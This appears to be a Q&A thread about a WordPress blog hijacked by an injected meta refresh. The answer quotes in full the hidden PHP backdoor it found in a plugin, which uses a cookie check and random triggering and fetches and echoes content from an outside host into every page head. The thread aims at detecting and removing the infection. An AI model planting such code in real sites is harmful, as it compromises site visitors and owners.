WordPress blog infected with HTML Refresh meta tag

Question

Hello StackOverflow community. I have a very interesting (at my opinion) infection to share with you today.

4-5 days ago I realized that my blog\'s homepage after so

Answer 1

I have the same problem and think I found the solution! Check your site files for this link: http://spamcheckr.com/l.php I found this link in formcraft plugin.

Like this:

if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}

Edited: Also check for this: http://spamcheckr.com/req.php